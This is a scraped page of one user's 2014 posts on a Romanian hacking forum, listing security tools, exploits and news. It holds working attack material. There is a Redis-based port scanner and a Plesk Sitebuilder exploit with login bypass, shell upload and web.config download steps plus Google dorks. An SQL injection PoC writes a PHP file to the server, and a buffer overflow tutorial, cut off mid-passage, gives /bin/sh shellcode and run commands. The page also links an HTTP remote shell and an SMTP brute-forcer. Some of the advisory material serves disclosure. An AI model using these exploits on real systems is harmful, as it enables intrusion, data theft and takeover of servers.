Fi8sVrs's Content - Page 45 - Romanian Security Team

This python script port scans a host using a redis server. #!/usr/bin/python# Thu Feb 13 16:55:32 UTC 2014 <aramosf @ unsec.net> # # Scan a host using redis server. # Using MIGRATE response: # MIGRATE 127.0.0.1 21 a 1 1 #-IOERR error or timeout writing to target instance #MIGRATE 127.0.0.1 22 a 1 1 #-IOERR error or timeout reading from target node import socket import sys import string if len(sys.argv) < 4: print sys.argv[0] + " [redis IP] [redis PORT] [iP to scan]" sys.exit() try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) except socket.error: print 'Failed' sys.exit() host = sys.argv[1]; port = int(sys.argv[2]); toscan = sys.argv[3]; readbuffer="" s.connect((host, port)) message = "set a1 1\r\n" try : s.sendall(message) except socket.error: print 'Failed' sys.exit() reply = s.recv(50) for p in range(1, 65535): message = "MIGRATE " + toscan + " " + str(p) + " a1 1 3000\r\n"; #print message try : s.sendall(message) except socket.error: print 'Failed' sys.exit() readbuffer=readbuffer+s.recv(1024) temp=string.split(readbuffer, "\n") readbuffer=temp.pop( ) for line in temp: line=string.rstrip(line) #print line if not "writing" in line: print str(p) + " open" if "OK" in line: message = "set a1 1\r\n" #print message s.sendall(message) reply=s.recv(10) s.close() DEScrypt Ztex Bruteforcer ? Packet Storm

July 31, 2014

DEScrypt Ztex Bruteforcer

Fi8sVrs posted a topic in Programe hacking

descrypt-ztex-bruteforcer ========================= This project is proof of concept for idea, that old FPGA boards can be reused for hashcracking purposes. Especially this one shows result overperforming those of GPUs. For now it is a bit ugly, and interfaces can be changed without prior notice. Building the bitstream ---------------------- Please refer to BUILD file. Please be aware that building bitstream takes about 40 minutes. Implementation details ---------------------- Design is splitted in two clock domains. External for IO which frequency is 48 MHz, and internal with frequency 240 MHz. That gives possible speed of 960 MH/s per ZTEX board with consumption of 40W. For comparison, AMD R290x performs at 120.1 MH/s with consumtion 300W. Unfortunately IO is VERY slow. Whithout using harware queues in FX2 microcontroller it takes 4 cycles per instruction, and there are plenty assembly instructions for sending single byte. Download Files from GiftsUngiven ? Packet Storm

July 31, 2014
1 reply

Putin: Crack Tor for me and I'll make you a MILLIONAIRE

Fi8sVrs posted a topic in Stiri securitate

Russian Interior Ministry offers big pile o' roubles for busting pro-privacy browser Russia's Interior Ministry has posted a tender seeking parties willing to “study the possibility of obtaining technical information about users (user equipment) TOR anonymous network". The tender appears to be open only to organisations rated to do secret work for the Russian government, but concluding that means the project has political aims may not be sensible. The local Pirate Party told Global Voices they think the project's origin in the Interior Ministry, rather than a military or intelligence agency, is a sign that pornography is the tender's real target. It's not unknown for governments to use agencies of convenience to get things done. Government agencies around the world are often terrible at sharing information and assets, as shown by the current push for re-use of code in “government app stores”. So perhaps this really is the Interior Ministry acting without thought to Russia's less-than-encouraging attitude to political views which are at variance with the ruling party's. Whatever the aim of the project, there's 3,900,000 roubles - $US 111,000 or £65,500 - up for grabs. ® Via Putin: Crack Tor for me and I'll make you a MILLIONAIRE • The Register

July 25, 2014
1 reply

Hello world

Fi8sVrs replied to Nest's topic in Bine ai venit

Bine ai revenit!

July 25, 2014
17 replies

PyHttpShell

Fi8sVrs posted a topic in Programe hacking

PyHttpShell is a shell written in python and php, traffic is over http protocol using a server in the middle. Features Transport over HTTP/HTTPS. Supports System Proxy Settings. Multiple Hosts/Connections. Download files to client machine. Change Sleep time remotely. Works on Win/MAC/Linux Download Sources: http://exploit.co.il/hacking/python-http-shell/ PyHTTPShell | Free software downloads at SourceForge.net

July 25, 2014
- pyhttpshell

Plesk Sitebuilder XSS / Bypass / Shell Upload / File Download

Fi8sVrs posted a topic in Exploituri

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder # Author : alieye # vendor : http://www.parallels.com/ # Contact : cseye_ut@yahoo.com # Risk : High # Class: Remote # # Google Dork: # inurl::2006/Sites ext:aspx # inurl::2006 inurl:.ashx?mediaid # intext:"© Copyright 2004-2007 SWsoft." ext:aspx # inurl:Wizard/HostingPreview.aspx?SiteID # # Date: 23/07/2014 # os : windows server 2003 # poc video clip : http://alieye.persiangig.com/video/plesk.rar/download # # version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010 # version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1-bypass loginpage (all version) http://victim.com:2006/login.aspx change url path to http://victim.com:2006/wizard --------------------------------------------------------- 2-uploading shell via Live HTTP Headers(Copyright 2004-2010) Tools Needed: Live HTTP Headers, Backdoor Shell Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx Step 2: Rename your shell to shell.asp.gif and start capturing data with Live HTTP Headers Step 3: Replay data with Live HTTP Headers - Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n] Step 5: go to shell path: http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp --------------------------------------------------------- 3-Arbitrary File Download Vulnerability(all version) You can download any file from your target http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename example: http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config --------------------------------------------------------- 4-xss(all version) you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy --------------------------------------------------------- 5-not authentication for making a website(all version) making malicious page and phishing page with these paths http://victim.com:2006/Wizard/Pages.aspx http://victim.com:2006/Wizard/Edit.aspx #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir [#] Thanks To All cseye members and All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To Master of Persian Music: Hossein Alizadeh [#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/ [#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Plesk Sitebuilder XSS / Bypass / Shell Upload / File Download ? Packet Storm

July 25, 2014

SILC - Secure Internet Live Conferencing

Fi8sVrs posted a topic in Programe securitate

SILC - Secure Internet Live Conferencing ======================================== SILC (Secure Internet Live Conferencing) is a modern and secure conferencing protocol. Features ======== SILC provides all the common conferencing services like private messages, instant messages, channels and groups, and video and audio conferencing. The main difference to other protocols is that SILC has been designed with security as its main feature - it is not an add-on or optional plugin - and security cannot be turned off. All SILC connections execute SILC Key Exchange protocol, an authenticated Diffie-Hellman key exchange algorithm, to generate a shared secret session key. All SILC packets exchanged between SILC clients and servers are protected with these keys. All private messages (instant messages) are protected with private message keys established using the SILC Key Exchange protocol over the SILC network. Private messages can be read only by the sender and the recipient of the message. SILC servers along the way cannot decrypt the messages. Optionally, private message key may also be a shared secret, such as passphrase, or the SILC Key Exchange may be performed peer-to-peer between clients. If all these methods fail the session keys are used as the last resort fallback to encrypt private messages. All channel and group messages are protected with channel specific keys generated by the SILC routers and only the members of the channel may read the messages. Optionally, channel members may set up a shared secret, such as passphrase, as the channel key to exclude SILC routers from knowing the key. Running SILC ============ After installing the SILC to the system the SILC client is started by giving command: silc If you want to run with specific configuration file give -f option. To run the server you should configure the server first. To run the server give the command: silcd This will launch the server on to the background. History ======= SILC was developed between 1996 and 1999 and released to public in 2000. SILC was originally developed by Pekka Riikonen. Download Contact ======= Feedback and comments are welcome. Bug reports should be sent to the development mailing list. Official SILC project web site : SILC - Secure Internet Live Conferencing FTP archive for SILC project : ftp://ftp.silcnet.org/ Development mailing list address : silc-devel@lists.silcnet.org SILC Server : /server silc.silcnet.org

July 24, 2014

E2 2844 SQL Injection

Fi8sVrs posted a topic in Exploituri

E2 version 2844 suffers from a remote SQL injection vulnerability. Advisory ID: HTB23222 Product: Ð•2 Vendor: Ilya Birman Vulnerable Version(s): v2844 and probably prior Tested Version: v2844 Advisory Publication: July 2, 2014 [without technical details] Vendor Notification: July 2, 2014 Vendor Patch: July 3, 2014 Public Disclosure: July 23, 2014 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-4736 Risk Level: High CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in Ð•2, which can be exploited to perform SQL injection attacks and gain control over the vulnerable application. 1) SQL Injection in Ð•2: CVE-2014-4736 The vlnerability exists due to insufficient sanitization of input data passed via the "note-id" HTTP POST parameter to "/@actions/comment-process" URI. A remote attacker can send a specially crafted HTTP POST request, inject and execute arbitrary SQL commands in applicationâ€™s database. Successful exploitation of the vulnerability may allow an attacker to add, modify or delete arbitrary records in database and gain complete access to the web site. PoC code below will create a PHP file "/var/www/file.php", containing "phpinfo()" call (if the filesystem permissions and MySQL configuration allow it): <form action="http://[host]/@actions/comment-process" method="post" name="main"> <input type="hidden" name="already-subscribed" value=""> <input type="hidden" name="comment-id" value="new"> <input type="hidden" name="elton-john" value="1"> <input type="hidden" name="email" value="mail@mail.com"> <input type="hidden" name="from" value=""> <input type="hidden" name="name" value="name"> <input type="hidden" name="subscribe" value="on"> <input type="hidden" name="text" value="1"> <input type="hidden" name="note-id" value="' UNION SELECT '<? phpinfo(); ?>',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2"> <input type="submit" id="btn"> </form> ----------------------------------------------------------------------------------------------- Solution: Update to Ð•2 version v2845 More Information: http://blogengine.ru/download/ ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23222 - https://www.htbridge.com/advisory/HTB23222 - SQL Injection in Ð•2. [2] Ð•2 - http://blogengine.ru/ - E2 is a perfect engine for blogging. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVEÂ® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWebÂ® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. http://packetstormsecurity.com/files/download/127594/e2-sql.txt

July 24, 2014
- cve-2014-4736
- htb23222

Optimizare site

Fi8sVrs replied to Cavani's topic in Off-topic

https://rstforums.com/forum/articole.rst spor la citit

July 24, 2014
3 replies

free SMTPs

Fi8sVrs replied to prussic's topic in Cosul de gunoi

July 24, 2014
22 replies

SMTPTX v1.0 Beta

Fi8sVrs posted a topic in Programe utile

SMTPTX is a very simple tool used for sending simple email and do some basic email testing from a pentester perspective. Its able to send messages without depending on knowing a specific MTA/SMTP server beforehand. Unlike tools like sendemail it handles the MX record resolution itself and connects to the relevant server and sends the email. Its able to add attachments, use TLS and do SMTP authentication, specify custom DNS servers and SMTP servers etc. More features are under way. The tool is intended to be used when assessing the functionality and basic configuration and security settings of SMTP servers and other pentesting oriented tasks. It may also be useful as a system tool in scripts and such for sending logs and such off of a system or anything that makes the life of the legit user/administrator easier. What SMTPTX isn't The tool is NOT a spam tool and was never intended to be such a tool. Thus SMTPTX is not permitted to be used as such! The author of SMTPTX cannot be held responsible for any illegal use of the tool. Beta Code The tool is currently in a beta state as it has not been extensively tested. Only the intended basic functionality has been verified under optimal conditions. Bugs and feature suggestions may be sent my way and I'll try to fix/implement them in a somewhat near future. No promises are being made though as I lead a very busy life. The code has only been tested on Linux (Debian/Kali) as I rarely use Windows. And as such, I don't know how it will behave on Windows or Mac. However, I don't see any reasons why it shouldn't run on those platforms. Further options are planned for SMTPTX, such as VRFY, custom EHLO, logging to file and a few more. I'm also thinking of implementing interactive mode and perhaps som basic dictionary attack features etc. Time will tell for sure. #!/usr/bin/env python#============================================================================== # Title : SMTPTX # Dependencies : Python v2.7 and Python DNS Toolkit (www.dnspython.org) # Version : 1.0 Beta # Author : Copyright © 2014 <circle@0x90.se>, http://www.0x90.se # Thanks/Creds : # Abstract : This very simple tool is used for sending simple email and # do some basic email testing from a pentester perspective. # Its able to send messages without depending on an specific # MTA/SMTP server. Unlike tools like sendemail it handles the # MX record resolution itself and connects to the relevant # server and sends the email. Knowing the address of the # specific SMTP server is thus not necessary. # # License : This code is free and released under the terms of GPL v3 # # Issues : First pre-production == Some issues do exist and functions # ARE missing. It is NOT very fault tolerant at all! # The basic stuff seem to work, no extensive tests has been # done! The code has been tested only on Linux (Debian & Kali) # # Todo : Near future improvements: # - Ability to accept domain only when resolving SMTP servers # and not rely on a full email address # - Add custom EHLO host, VRFY and the like options # - Add logging to file # - Add 'quiet' option in order to suppress all output # Todo : Later improvements: # - Structure the code in a better manner # - Perhaps add interactive mode # # Change log : Initial release == Bugs for sure! # # THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND ANY CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR ANY CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS # OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) # HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY # OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF # SUCH DAMAGE. # # THIS PROGRAM MAY NOT BE USED IN ANY ILLEGAL ACTIVITIES! # #============================================================================== import sys import os import getopt import time import re import smtplib import email.utils from email.MIMEMultipart import MIMEMultipart from email.MIMEText import MIMEText from email.MIMEBase import MIMEBase from email import Encoders def banner(): print(" ") print("===========================================================================") print(" SMTPTX v1.0 Beta by <circle@0x90.se>, http://www.0x90.se GPL v3 ") print(" A small and very simple email testing tool ") print("===========================================================================") print(" ") def usage(): print(" ") print(" -h --help ") print(" Help section, and you are looking at it ") print(" ") print(" -f --from <FROM_ADDRESS> ") print(" If no from address is used, someone@somewhere.com will be used instead ") print(" ") print(" -t --to <TO_ADDRESS> ") print(" If no to address is given, the from address will be used (relay test) ") print(" ") print(" -m --message <MESSAGE> ") print(" Plain text or HTML. If no message is given, time and date will be used ") print(" ") print(" -s --subject <SUBJECT> ") print(" If no subject is given, the default string \"This is a test\" is used ") print(" ") print(" -a --attachment <FILENAME> ") print(" Given in the form of a path: \\path\\to\\file ") print(" ") print(" -d --dns <IP_ADDRESS> ") print(" Use a custom DNS server for resolving MX records ") print(" ") print(" -T --dns-timeout <SECONDS> ") print(" Set a custom DNS resolution timeout in seconds. Default is 3s ") print(" ") print(" -S --smtp-server <SMTP_SERVER> ") print(" Use a specific SMTP server ") print(" ") print(" -p --smtp-port <PORT> ") print(" Use a non-standard port for the remote SMTP server. Default is 25 ") print(" ") print(" -U --username <USERNAME> ") print(" Username for SMTP server authentication ") print(" ") print(" -P --password <PASSWORD> ") print(" Password for SMTP server authentication ") print(" ") print(" -r --resolve ") print(" Only resolve SMTP server(s) for a given email address. No email is sent") print(" Must be used in conjunction with option: -t ") print(" ") print(" -v --verbose ") print(" Verbose output. Add extra status messages to standard output ") print(" ") print(" -e --use-tls ") print(" Use encryption capabilities if SMTP server supports it ") print(" ") return def resolve_smtp_server(optsData): """ Resolve the MX record of the given email domain name e.g. hotmail.com and return a list with SMTP servers. This is kinda dirty since the DNS query returns an object and the documentation is missing some information on this. Or perhaps its just the ignorant self... TODO: """ smtpServers = [] dnsResolver = dns.resolver.Resolver() dnsResolver.timeout = optsData['dnstimeout'] dnsResolver.lifetime = optsData['dnstimeout'] if optsData['dns']: print (" Using custom DNS Server: %s" % optsData['dns']) dnsResolver.nameservers = [optsData['dns']] matchDomain = re.match(r'.*@(.*)', optsData['to'], re.M | re.I) mailDomain = matchDomain.group(1) print (" Resolving MX records for: %s\n" % mailDomain) try: mxQuery = dns.resolver.query(mailDomain, 'MX') except dns.exception.DNSException as dnsError: print(" A DNS error was encountered! Reason:\n") print(dnsError) sys.exit(1) print (" Resolved %i SMTP host(s)" % (len(mxQuery))) print ("") # Populate the hosts list with SMTP servers for mxData in mxQuery: mxRecord = repr(mxData.exchange) mxString = re.match(r'<DNS name (.*)\.>$', mxRecord, re.M | re.I) mxHost = mxString.group(1) try: # Give us the IP address of each MX host aQuery = dns.resolver.query(mxHost, 'A')[0].address except dns.exception.DNSException as dnsError: print(" A DNS error was encountered! Reason:\n") print(dnsError) sys.exit(1) print(" - %s -> %s" % (mxHost, aQuery)) smtpServers.append(mxHost) print("") optsData['smtpServer'] = smtpServers[0] return def send_email(optsData): """ Send the email based on the dictionary passed to this function. TODO: """ emailMessage = MIMEMultipart() emailMessage['To'] = email.utils.formataddr(('', optsData['to'])) emailMessage['From'] = email.utils.formataddr(('', optsData['from'])) emailMessage['Subject'] = optsData['subject'] emailMessage.attach(MIMEText(optsData['message'])) if optsData['attachment']: add_attachment(optsData, emailMessage) if optsData['verbose']: print (" This is what will be sent:\n") print (emailMessage.as_string()) if optsData['attachment']: print (" Attached file: %s\n" % optsData['attachment']) try: if optsData['verbose']: print (" Using SMTP server: %s:%d\n" % (optsData['smtpServer'], optsData['smtpPort'])) smtpHandler = smtplib.SMTP(optsData['smtpServer'], optsData['smtpPort']) smtpHandler.set_debuglevel(optsData['verbose']) # We need to perform a EHLO in order to get a list of supported features smtpHandler.ehlo() if optsData['usetls']: if smtpHandler.has_extn('STARTTLS'): try: print ("\n Server supports TLS, using it...\n") smtpHandler.starttls() except smtplib.SMTPException as smtpError: print (" Failure of biblical proportions! Unable to send email. Reason:\n") print (" %s\n" % smtpError) sys.exit(1) else: print (" Server does not seem to support TLS, skipping...\n") # Reidentify over TLS if set up smtpHandler.ehlo() if optsData['username'] and optsData['password']: try: smtpHandler.login(optsData['username'], optsData['password']) except smtplib.SMTPAuthenticationError: print(" Authentication failure!\n") print(" Will try to ignore...\n") smtpHandler.sendmail(optsData['from'], [optsData['to']], emailMessage.as_string()) smtpHandler.quit() print ("\n The email has been sent!\n") except smtplib.SMTPException as smtpError: print (" Failure of biblical proportions! Unable to send email. Reason:\n") print (" %s\n" % smtpError) sys.exit(1) return def add_attachment(optsData, emailMessage): """ Add any type of attachment to the email. TODO: Add attachment size check? """ part = MIMEBase('application', "octet-stream") # part.set_payload(open(optsData['attachment'], "rb").read()) try: attachment = open(optsData['attachment'], "rb") # We will exit as a safety precaution as we perhaps don't want to screw up for # example a social engineering campaign due to a simple file not found error! except IOError as fileError: print(" Unable to open the attachment file! Reason:\n") print(fileError) sys.exit(1) part.set_payload(attachment.read()) Encoders.encode_base64(part) part.add_header('Content-Disposition', 'attachment; filename=%s' % os.path.basename(optsData['attachment'])) emailMessage.attach(part) return def main(): """ Main function and argument collector/processor TODO: """ optsData = {'to': '', 'from': 'someone@somewhere.com', 'subject': 'This is a test', 'message': time.asctime(time.localtime(time.time())), 'verbose': False, 'smtpServer': '', 'smtpPort': 25, 'dns': '', 'dnstimeout': 3, 'resolve': False, 'attachment': '', 'username': False, 'password': False, 'usetls': False} banner() try: if len(sys.argv) < 2: print("Too few arguments supplied...") usage() sys.exit(1) opts, args = getopt.getopt(sys.argv[1:], "hvf:t:m:s:d:T:S:p:ra:U:P:e", ["help", "verbose", "from=, "to=", "message=", "subject=", "dns=", "dns-timeout=", "smtp-server=", "smtp-port=", "resolve", "attachment=", "username=", "password=", "use-tls]) except getopt.GetoptError as err: print(err) usage() sys.exit(1) for opt, arg in opts: if opt in ('-h', '--help'): usage() sys.exit(2) elif opt in ('-v', '--verbose'): optsData['verbose'] = True elif opt in ('-f', '--from'): optsData['from'] = arg elif opt in ('-t', '--to'): optsData['to'] = arg elif opt in ('-s', '--subject'): optsData['subject'] = arg elif opt in ('-m', '--message'): optsData['message'] = arg elif opt in ('-d', '--dns'): optsData['dns'] = arg elif opt in ('-T', '--dns-timeout'): optsData['dnstimeout'] = int(arg) elif opt in ('-a', '--attachment'): optsData['attachment'] = arg elif opt in ('-S', '--smtp-server'): optsData['smtpServer'] = arg elif opt in ('-p', '--smtp-port'): optsData['smtpPort'] = int(arg) elif opt in ('-r', '--resolve'): optsData['resolve'] = True elif opt in ('-U', '--username'): optsData['username'] = arg elif opt in ('-P', '--password'): optsData['password'] = arg elif opt in ('-e', '--use-tls'): optsData['usetls'] = True else: usage() sys.exit(1) if optsData['resolve']: if not optsData['to']: print(" Error: No recipient address was given!") usage() sys.exit(1) resolve_smtp_server(optsData) sys.exit(0) elif optsData['smtpServer']: send_email(optsData) else: resolve_smtp_server(optsData) send_email(optsData) if __name__ == "__main__": try: import dns.resolver import dns.exception except ImportError: print(" Import Error: You seem to be missing the DNS Python library! ") print(" Either check your installation or go to www.pythondns.org ") print(" Also try using: sudo pip install dnspython ") sys.exit(1) main() # ---[ EOF ]--- Source

July 7, 2014

XSSYA Cross Site Scripting Scanner

Fi8sVrs posted a topic in Programe hacking

XSSYA is a Cross Site Scripting Scanner & Vulnerability Confirmation (Working in two Methods) • Method number 1 for Confirmation Request and Response • Method number 2 for Confirmation Execute encoded payload and search for the same payload in web HTML code but decoded • Support HTTPS • After Confirmation (execute payload to get cookies) • Identify 3 Types of WAF (Mod_Security - WebKnight - F5 BIG IP) • Can be run in (Windows - Linux) XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall) It Also Support Saving the Web Html Code Before Executing the Payload Viewing the Web HTML Code into the Screen or Terminal $ Python xssya.py Links should end with (/or=or?) Example $ Python xssya.py http://www.domain.com/ http://www.domain.com= http://www.domain.com? The only Module need to download is colorama-0.2.7 https://pypi.python.org/pypi/colorama Note: Crawling (need to be enhanced) Download: Download: XSSYA Cross Site Scripting Scanner ? Packet Storm Author: Yehiamamdouh51@hotmail.com secure-edf provide tools for web application articles & videos check xssya xss - cross site scripting scanner and vulnerability confiramtion

July 7, 2014

SMTP Bruter (Windows)

Fi8sVrs posted a topic in Programe hacking

Autor: Ar3s Content: connection_fix.reg log-valid.txt SMTP-Error-Log.txt ip.txt SmtpBruter.exe test1 keys.txt wordlist.txt Virustotal Rulati in masina virtuala Download: http://uppit.com/uod04irry320/SMTP_BRUTER.RAR Necesita .NET Framework 4 ...

July 1, 2014
27 replies

Buffer Overflow Exploitation for Beginners

Fi8sVrs posted a topic in Reverse engineering & exploit development

Prerequisites: Basic/Intermediate knowledge of Assembly Language Basic/Intermediate knowledge of GDB (GNU Debugger) Which is the debugger I will be using for this tutorial A good understanding of the C/C++ Languages A good understanding of how the stack is ordered and processed in a computer Introduction: A Buffer Overflow, is a vulnerability which is encountered when a program writing data to a buffer, exceeds the bounds of the buffer, causing the excess data to overflow into adjacent memory. Picture this, we have created a C program, in which we have initialized a variable, buffer, of type char, with a buffer size of 500 bytes: int main(void) { char buffer[500]; } And in this program, we take input from the command line, which is then copied to a buffer, via the C function strcpy(). int main(int argc, char *argv[]) { char buffer[500]; strcpy(buffer, argv[1]); } Notice, that we have not checked whether or not the length of argv[1] is within the buffers range of 500 bytes; Why not? Well, you'd think that like most modern day programming languages, the strcpy() function would check this before copying the data to the buffer? This is not the case, and is a common misconception made my novice programmers who are not aware of the security implications regarding certain functions, which is why this vulnerability exists and may continue to exist further into the future. Now, you may be wondering how you could possibly exploit such a vulnerability, I mean what good is writing a few bytes into memory.. Well, on it's own, nothing, but if you were to overwrite the return pointer of the function which you are within, you could ultimately alter the flow of code execution within the program that you are targeting. For example, in the program above, say that theoretically the memory location of buffer starts at 0x00000000, and ends at 0x0000007D (which should have 500 bytes of space), and that the return pointer is located 524 Bytes away from that, it would take an input of 1024 Bytes, e.g 1024 "A"'s, to get "behind" the return pointer, which means that you can then overwrite the next 4 bytes of memory defined as the return pointer, and then watch as it is POP'ed into the EIP register, and executes whatever code, malicious or otherwise, which may lie on the other end address you specify. Now we get on to the really fun bit, where we actually get to exploit a program which is susceptible to this exploit vector. If you are going to attempt this on your own computer, firstly, make sure you are NOT using Windows >= Vista, as Windows >= Vista, have protections in place, such as ESP (Executable Space Protection), ASLR (Address Space Layout Randomization), and various other exploit prevention techniques. It would be more advisable to use operating systems such as Linux, Unix, and other Unix based operating systems to get this working, as it's easier to disable the countermeasures put in place by running a command such as: sudo echo > /proc/sys/kernel/randomize_va_space Which will disable your systems ASLR until you reboot, which is not an option in Windows operating systems (that I'm aware of). If you do not have access to a Linux operating system, or are too lazy to dual boot or install a VM, you can SSH into various wargaming servers (such as Smash The Stack or Over The Wire) to practice the skills learned here in a legal and safe way, with minimalistic effort, for all you lazy h4xx0rs out there. Now, on with thy spl0itz. I'm going to use a simple source code from Smash The Stack : Blowfish, which does not currently have a webpage. Here is the code: #include <stdio.h> int main(int argc, char * argv[]) { char buf[256]; if(argc == 1) { printf("Usage: %s input\n", argv[]); exit(); } strcpy(buf,argv[1]); printf("%s", buf); } As you can see, it follows the same principles as the example code used previously in the tutorial, but with some extra validation to make sure that argv[1] is present. So, lets compile this code and continue. In this tutorial, I'm going to use GCC (GNU C Compiler) from the GNU Compiler Collection to compile my code. I will compile using the following command: gcc bof.c -g -fno_stack_protector -o bof Which will compile the code with required headers for gdb to be able to debug it, and also disable gcc's stack protection in systems which have patched gcc to have it enabled by default. Once we have compiled our vulnerable code, we can open the executable, which I have called "bof", with GDB, for debugging, using the command: gdb bof Which should give you something similar to this: Now that we are in GDB, we can start getting into the real exploitation; firstly, we want to make sure that we can run the executable correctly from GDB. We can do this simply by typing "run", which should return: If it returns an error instead, then try moving to a folder where you have sufficient permissions. Assuming that the program executes, then exits normally, we can carry on. We now need to establish how many bytes we have to enter until we have control over the return pointer. There is two main ways to do this: Trial and error or A string which never repeats a sequence of bytes, allowing for easy identification I tend to just use trial and error, as the second option requires the Metasploit Framework, which may not be available on machines such as the ones you will encounter while wargaming. run perl -e 'print "A" x 512' which for me, causes a segmentation fault, which occurs when EIP is set to an address which cannot be executed, or is outside of the available memory for the program. So, now that we know the return pointer resides within 512 bytes of the start of our buffer, we can start to slowly decrement the amount of "A"'s that we print, until the program executes without error, and returns "Program Exited Normally.", which for me, occurs at 268 Bytes, which is only 12 Bytes away from the end of our buffer. This means that the return pointer lies between 268 Bytes and 273 Bytes. Armed with this knowledge, we can move on to adding in our shellcode, which is comprised of the opcodes of Assembly instructions. The shellcode I will be using for this tutorial is a /bin/sh shellcode written by a fairly recently retired member of SoldierX, jip, which will drop you into a bash shell which has the permissions of the program you are attacking. Here it is: \x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 So, what do we do now? Well, we have to incorporate this into our exploit. we do this by first adding the shellcode into the Perl string, giving us this bash / Perl code: So, for trial and error, we want to type run: run perl -e 'print "A" x 268 . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' And then we must take away the amount of Bytes the shellcode contains, from the overall amount of "A"'s (or whatever filler you are using), so that we still retain control over the return pointer. In order to do this, we must replace the number "268", with "(268 - 26)", where 26 is the amount of Bytes in the shellcode (Every 2 Bytes in the shellcode equates to one Byte in Hex, the "\x" signifies the following 2 Bytes are a hexadecimal Byte). This will give is this code: run perl -e 'print "A" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' This command on it's own will not actually give us a working exploit; for that, we need to find out the address of where our shellcode is stored. But before we get into the nitty gritty with Assembly Language, I want to make 2 more adjustments to our current exploit: A nop sled An address "placeholder", as the longer or shorter the exploit is, the more the memory allocations shift around. by giving us a placeholder, we are securing a permanent place in memory The altered code will look like this: run perl -e 'print "\x90" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xff\xff\xff\xff"' Now, we've got an almost working exploit, all we have to do now, is find that memory address, to do that, we have to run "disas main", which will give us the following result: This is where you will need to have some knowledge of Assembly to get through As you can see, we have a full dump of the programs Assembly code; so, what do we do with it? Well, first, we have to look for the call to strcpy(), which should be pretty easy, as it's marked in the Assembly code as "strcpy@plt". So once he know where the strcpy() is called, we can set a break point to pause before it is called, and examine the stack. To do this, run the command "break *main+79". Run the program again, and we should get something like: which signifies that the program is waiting at the specified breakpoint. We now want to examine the top two pointers on the stack, which are the arguments which will be passed to the strcpy() function. To do this we type "x/2x $esp", which will give us: The two 